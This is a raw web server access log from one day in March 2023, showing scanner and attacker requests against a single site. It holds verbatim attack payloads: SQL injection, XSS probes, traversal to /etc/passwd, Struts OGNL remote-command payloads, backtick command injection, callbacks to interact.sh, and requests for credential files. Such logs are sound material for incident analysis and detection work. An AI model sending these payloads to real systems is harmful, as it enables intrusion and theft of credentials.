90.151.171.106 - - [09/Mar/2023:16:05:07 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:16:05:08 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:16:05:12 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:16:05:12 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:16:05:18 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:16:05:18 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:16:05:23 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:16:05:23 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:16:06:47 +0530] "GET /%20CSCOU%20/../%20CSCOE%20/files/file_list.json?path=/sessions HTTP/1.1" 404 1088
72.44.65.82 - - [09/Mar/2023:16:09:35 +0530] "GET /compliancepolicyelements.inc.php?search=True&searchColumn=elementName&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1" 404 1058
72.44.65.82 - - [09/Mar/2023:16:11:33 +0530] "GET null null" 400 -
193.142.146.101 - - [09/Mar/2023:16:16:53 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:16:17:25 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:16:17:56 +0530] "GET /backupsettings.dat HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:16:20:52 +0530] "GET /?author=1 HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:16:25:10 +0530] "GET /Admin HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:16:26:13 +0530] "GET /cache/backup/ HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:16:29:04 +0530] "GET /index.php?id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&lvl=author_see HTTP/1.1" 404 1012
213.226.123.100 - - [09/Mar/2023:16:31:59 +0530] "-" 400 -
213.226.123.100 - - [09/Mar/2023:16:31:59 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:16:34:08 +0530] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 404 1096
72.44.65.82 - - [09/Mar/2023:16:37:00 +0530] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:16:37:41 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
60.26.84.181 - - [09/Mar/2023:16:39:51 +0530] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1040
72.44.65.82 - - [09/Mar/2023:16:41:26 +0530] "GET /portal/displayAPSForm.action?debug=command&expression=5356*9556 HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:16:42:39 +0530] "GET /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:16:44:09 +0530] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:16:45:11 +0530] "GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1114
46.174.191.30 - - [09/Mar/2023:16:47:42 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [09/Mar/2023:16:48:04 +0530] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:16:52:16 +0530] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 404 1040
90.151.171.106 - - [09/Mar/2023:16:52:24 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:16:52:24 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:16:52:24 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:16:52:24 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:16:52:29 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:16:52:29 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [09/Mar/2023:16:52:29 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:16:52:29 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:16:53:22 +0530] "GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1" 404 1172
72.44.65.82 - - [09/Mar/2023:16:54:14 +0530] "GET /AccessAnywhere/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:16:56:06 +0530] "GET /wp-content/uploads/data.txt HTTP/1.1" 404 1048
92.118.39.82 - - [09/Mar/2023:17:01:15 +0530] "GET / HTTP/1.1" 200 11250
107.189.2.248 - - [09/Mar/2023:17:01:23 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
68.183.215.8 - - [09/Mar/2023:17:04:12 +0530] "GET /aaa9 HTTP/1.1" 404 1002
68.183.215.8 - - [09/Mar/2023:17:04:13 +0530] "GET /aab8 HTTP/1.1" 404 1002
72.44.65.82 - - [09/Mar/2023:17:06:35 +0530] "GET /public/login.htm?type=probes HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:17:06:54 +0530] "GET /public/login.htm?type=treestat HTTP/1.1" 404 1026
146.190.56.73 - - [09/Mar/2023:17:07:33 +0530] "GET /aaa9 HTTP/1.1" 404 1002
146.190.56.73 - - [09/Mar/2023:17:07:34 +0530] "GET /aab8 HTTP/1.1" 404 1002
72.44.65.82 - - [09/Mar/2023:17:07:57 +0530] "GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F103.145.51.236:8080%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1" 404 1044
72.44.65.82 - - [09/Mar/2023:17:08:01 +0530] "GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 400 -
104.152.52.231 - - [09/Mar/2023:17:08:40 +0530] "GET / HTTP/1.0" 200 11230
104.152.52.231 - - [09/Mar/2023:17:08:40 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [09/Mar/2023:17:09:15 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:17:10:51 +0530] "GET /SSI/Auth/ip_snmp.htm HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:17:11:25 +0530] "GET /website/lang/en_US?r=https://interact.sh/ HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:17:14:30 +0530] "GET //interactsh.com%2f.. HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:17:20:57 +0530] "GET /index.php?action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd&option=com_extplorer HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:17:22:39 +0530] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:17:23:38 +0530] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:17:26:28 +0530] "GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:17:26:46 +0530] "POST /index.php?a=attemptLogin&m=login HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:17:27:26 +0530] "GET /PolicyMgmt/policyDetailsCard.do?poID=19&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E&typeID=3 HTTP/1.1" 404 1056
72.44.65.82 - - [09/Mar/2023:17:31:10 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:17:31:10 +0530] "GET /?page=step_1 HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:17:33:57 +0530] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1" 404 1208
72.44.65.82 - - [09/Mar/2023:17:36:11 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:17:37:15 +0530] "GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:17:38:32 +0530] "POST /public/checklogin.htm HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:17:39:53 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
90.151.171.108 - - [09/Mar/2023:17:42:32 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:17:42:32 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:17:42:37 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:17:42:37 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:17:42:42 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:17:42:42 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:17:42:47 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:17:42:47 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:17:47:14 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:17:47:54 +0530] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:17:50:09 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:17:50:47 +0530] "GET /docker-compose.production.yml HTTP/1.1" 404 1052
72.44.65.82 - - [09/Mar/2023:17:50:58 +0530] "GET /docker-compose.dev.yml HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:17:54:00 +0530] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:17:54:11 +0530] "GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:18:04:01 +0530] "GET /.git-credentials HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:18:04:11 +0530] "GET /servicedesk/customer/user/signup HTTP/1.1" 404 1058
72.44.65.82 - - [09/Mar/2023:18:04:16 +0530] "GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1" 404 1110
72.44.65.82 - - [09/Mar/2023:18:04:38 +0530] "POST /secure/Signup.jspa HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:18:04:40 +0530] "GET /installer/installerUI.php HTTP/1.1" 404 1044
72.44.65.82 - - [09/Mar/2023:18:06:15 +0530] "POST / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:18:06:48 +0530] "GET /libs/granite/offloading/content/view.html HTTP/1.1" 404 1076
72.44.65.82 - - [09/Mar/2023:18:09:50 +0530] "GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 1090
72.44.65.82 - - [09/Mar/2023:18:09:58 +0530] "GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1" 404 1082
72.44.65.82 - - [09/Mar/2023:18:10:10 +0530] "GET /plugins/servlet/svnwebclient/error.jsp?description=test&errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 1070
72.44.65.82 - - [09/Mar/2023:18:10:10 +0530] "GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 1078
103.89.14.169 - - [09/Mar/2023:18:10:30 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:18:12:36 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:18:12:36 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:18:12:41 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:18:12:41 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:18:12:46 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:18:12:46 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:18:12:51 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:18:12:51 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:18:13:03 +0530] "GET /?after_logout=https://interact.sh&aiowpsec_do_log_out=1 HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:18:15:13 +0530] "POST /directdata/direct/router HTTP/1.1" 404 1042
72.44.65.82 - - [09/Mar/2023:18:15:14 +0530] "GET /2MgieEnDdowIo7fFyDlHQcAWngg.txt HTTP/1.1" 404 1056
72.44.65.82 - - [09/Mar/2023:18:16:37 +0530] "GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1094
103.89.14.169 - - [09/Mar/2023:18:18:54 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:18:29:10 +0530] "GET /Export_Log?/etc/passwd HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:18:30:15 +0530] "GET null null" 400 -
92.118.39.82 - - [09/Mar/2023:18:34:24 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:18:38:40 +0530] "GET /Setup/index.php/ HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:18:42:50 +0530] "GET /components/com_moofaq/includes/file_includer.php?file=/../../../../../etc/passwd&gzip=0 HTTP/1.1" 404 1090
90.151.171.106 - - [09/Mar/2023:18:44:36 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:18:44:36 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:18:44:36 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:18:44:36 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:18:44:36 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [09/Mar/2023:18:44:41 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:18:44:41 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:18:44:41 +0530] "-" 400 -
193.142.146.101 - - [09/Mar/2023:18:45:12 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:18:45:16 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:18:46:47 +0530] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:18:50:58 +0530] "GET /pods HTTP/1.1" 404 1002
72.44.65.82 - - [09/Mar/2023:18:56:18 +0530] "GET /car1/estimateresult/result?s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:18:57:42 +0530] "GET /versa/login.html HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:18:57:46 +0530] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1116
72.44.65.82 - - [09/Mar/2023:18:58:06 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:18:58:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
72.44.65.82 - - [09/Mar/2023:18:58:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
72.44.65.82 - - [09/Mar/2023:18:58:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
72.44.65.82 - - [09/Mar/2023:18:58:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
72.44.65.82 - - [09/Mar/2023:18:59:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
92.118.39.82 - - [09/Mar/2023:18:59:11 +0530] "GET / HTTP/1.1" 200 11250
103.89.14.169 - - [09/Mar/2023:18:59:51 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:19:00:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
167.172.110.137 - - [09/Mar/2023:19:04:48 +0530] "-" 400 -
167.172.110.137 - - [09/Mar/2023:19:04:48 +0530] "-" 400 -
167.172.110.137 - - [09/Mar/2023:19:04:48 +0530] "GET / HTTP/1.1" 200 11250
167.172.110.137 - - [09/Mar/2023:19:04:49 +0530] "-" 400 -
167.172.110.137 - - [09/Mar/2023:19:04:49 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:19:06:12 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:19:06:43 +0530] "GET /?db=mysql&server=db&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&username=root HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:19:09:14 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:19:09:27 +0530] "GET /OA_HTML/jtfwrepo.xml HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:19:14:18 +0530] "GET /?errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_id=0 HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:19:16:16 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
193.47.61.251 - - [09/Mar/2023:19:16:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
193.47.61.251 - - [09/Mar/2023:19:16:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.89.14.169 - - [09/Mar/2023:19:17:36 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
78.108.177.54 - - [09/Mar/2023:19:20:23 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [09/Mar/2023:19:23:02 +0530] "POST /apply.cgi HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:19:24:07 +0530] "GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1064
193.118.53.194 - - [09/Mar/2023:19:24:20 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:19:25:33 +0530] "CONNECT api.ipify.org:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:19:25:33 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:19:25:33 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:19:25:33 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:19:25:33 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:19:25:38 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:19:25:38 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:19:25:38 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:19:31:45 +0530] "GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1134
72.44.65.82 - - [09/Mar/2023:19:35:33 +0530] "GET /?url=http://interact.sh HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:19:42:44 +0530] "GET /elmah HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:19:42:52 +0530] "GET /elmah.axd HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:19:44:46 +0530] "POST /maint/index.php?packages HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:19:44:53 +0530] "GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:19:47:44 +0530] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:19:49:51 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:19:51:59 +0530] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:19:52:00 +0530] "GET /_phpmyadmin/scripts/setup.php HTTP/1.1" 404 1052
72.44.65.82 - - [09/Mar/2023:19:52:11 +0530] "GET /php/phpmyadmin/scripts/setup.php HTTP/1.1" 404 1058
72.44.65.82 - - [09/Mar/2023:19:53:22 +0530] "GET /setup/index.php HTTP/1.1" 404 1024
103.89.14.169 - - [09/Mar/2023:20:13:40 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:20:21:32 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:20:21:32 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
193.142.146.101 - - [09/Mar/2023:20:21:32 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:20:21:35 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:20:21:37 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:20:21:37 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:20:21:42 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:20:21:42 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:20:21:47 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:20:21:47 +0530] "-" 400 -
45.86.202.208 - - [09/Mar/2023:20:32:51 +0530] "-" 400 -
194.169.217.215 - - [09/Mar/2023:20:32:51 +0530] "-" 400 -
